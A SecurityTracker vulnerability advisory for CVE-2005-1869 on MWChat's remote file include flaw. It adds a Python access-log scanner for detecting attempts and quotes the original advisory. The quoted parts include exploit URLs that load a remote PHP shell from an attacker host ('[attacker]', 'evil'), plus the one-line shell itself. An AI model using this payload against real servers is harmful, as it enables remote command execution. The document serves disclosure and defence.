SecurityTracker.com
Category:   Application (Instant Messaging/IRC/Chat)  >   MWChat
Vendors:   AppIndex
MWChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014090
SecurityTracker URL:  http://securitytracker.com/id/1014090
CVE Reference:   CVE-2005-1869
Updated:  Jun 9 2005
Original Entry Date:  Jun 2 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): prior to 6.8
Description:   Status-x reported a vulnerability in MWChat. A remote user can execute arbitrary commands on the target system.

The 'start_lobby.php' script includes the 'chat_maintainance.php' script relative to the user-supplied '$CONFIG[MWCHAT_Libs]' parameter without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname%20-a

The original advisory is available at:

http://www.defacers.com.mx/advisories/4.txt

[Editor's note: The vendor's distribution includes default '.htaccess' files for several directories, including the 'libs' directory. Only systems where the '.htaccess' file has been removed or modified are affected.]
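
One way to look for attempts against this flaw in web server access logs, as an added example that is not part of the original advisory or the vendor's code: it flags any request that supplies a 'CONFIG[...]' parameter and marks those whose value is a URL. The log lines are constructed, and reading a 403 as the default '.htaccess' still being in place is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed combined-format access-log lines; IPs and host names are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Jun/2005:10:01:00 +0000] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://files.example/cmd.txt?&cmd=uname%20-a HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Jun/2005:10:01:05 +0000] "GET /mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=hTTp%3A%2F%2Ffiles.example%2Fcmd.txt%3F HTTP/1.1" 403 199',
    '203.0.113.9 - - [02/Jun/2005:10:02:00 +0000] "GET /mwchat/index.php?room=lobby HTTP/1.1" 200 4096',
    '203.0.113.9 - - [02/Jun/2005:10:02:10 +0000] "GET /mwchat/chat.php?ref=http://www.example.org/ HTTP/1.1" 200 2048',
]

# client address, request target (spaces tolerated), response status
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+" (\d{3})')
# A CONFIG[...] array element should never arrive in the query string.
CONFIG_KEY = re.compile(r'^CONFIG\[[^\]]*\]$')
# A URL where the script expects a local library directory.
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftp)://', re.I)


def find_include_attempts(lines):
    """Return (client, path, parameter, verdict) for requests that set CONFIG[...]."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes keys and values, so CONFIG%5B...%5D is caught too.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if not CONFIG_KEY.match(key):
                continue  # a URL in an unrelated parameter (e.g. ref=) is not flagged
            kind = "remote-url" if REMOTE_VALUE.match(value) else "config-override"
            # Assumption: 403 means the default .htaccess still blocks the directory.
            outcome = "blocked" if status == "403" else "served"
            findings.append((client, path, key, f"{kind}/{outcome}"))
    return findings


if __name__ == "__main__":
    for finding in find_include_attempts(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A "served" verdict means the script answered the request, so that host should be checked for the removed or modified '.htaccess' and upgraded to 6.8.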

Impact:   A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (6.8), available at:

http://www.appindex.net/products/detail/?product=mwchat

Vendor URL:  www.appindex.net/products/detail/?product=mwchat
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  MW Chat Remote File Include


#####################################################################
MW CHAT Version 6.xx Remote File Include
Affected Script: start_lobby.php
Vendor: http://www.appindex.net
Vendor Response: None I suppose because the site is not updated since 2003
Vendor Confirmed: No but I confirmed  ;)

Http://www.defacers.com.mx/advisories/4.txt - Advisory #4

Author: Status-x             E-mail: phr4xz@gmail.com

####################################################################

====================================================================


Description:

MW CHAT is a free chat system which allows users to communicate with
emoticons, colors and with a good visual design.


====================================================================


Vulnerability Description:


The bug is inside the "libs" DIR and also is located in other files
but in the other files the vulnerability cannot be confirmed

Let's take a look into the start_lobby.php source:


*********************************************************************
$Sequence = $STATUS[CLIENT_IP];
$Sequence_Check = base64_encode($Sequence);
include("$CONFIG[MWCHAT_Libs]/chat_maintainance.php");
$rgLobby_SELECT = db_query(Validate(3), $CONN);
$szResult = db_numrows($rgLobby_SELECT);
if ($szResult == "0")
*********************************************************************

And as we can see in all the source code the $CONFIG[MWCHAT_Libs]
variable is not defined so we can make a cmd.txt file with the next
source


***************
<?
system($cmd)
?>
***************


Then we upload that file into a webserver and can execute *NIX CMD
into the affected server or site


http://silly.com/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evil/cmd.txt?&cmd=uname -a


And we will get a nice answer from the affected server


*******************************************************
Linux ass 2.4.29-rc1 #1 SMP Fri Jan 7 17:47:33 MST 2005
*******************************************************


====================================================================


How to Fix:


The vendor didn't reply but I suppose changing the affected source
with the next one the trouble should be corrected  ;)


*********************************************************************
$Sequence = $STATUS[CLIENT_IP];
$Sequence_Check = base64_encode($Sequence);
include("/libs/chat_maintainance.php");
$rgLobby_SELECT = db_query(Validate(3), $CONN);
$szResult = db_numrows($rgLobby_SELECT);
if ($szResult == "0")
*********************************************************************


Or xD hehehe try to contact the vendor  ;) 


====================================================================


Credits and Contact:


This vulnerability was discovered by Status-x | phr4xz@gmail.com


Http://www.defacers.com.mx


01 June 2005

====================================================================
 
 



Copyright 2020, SecurityGlobal.net LLC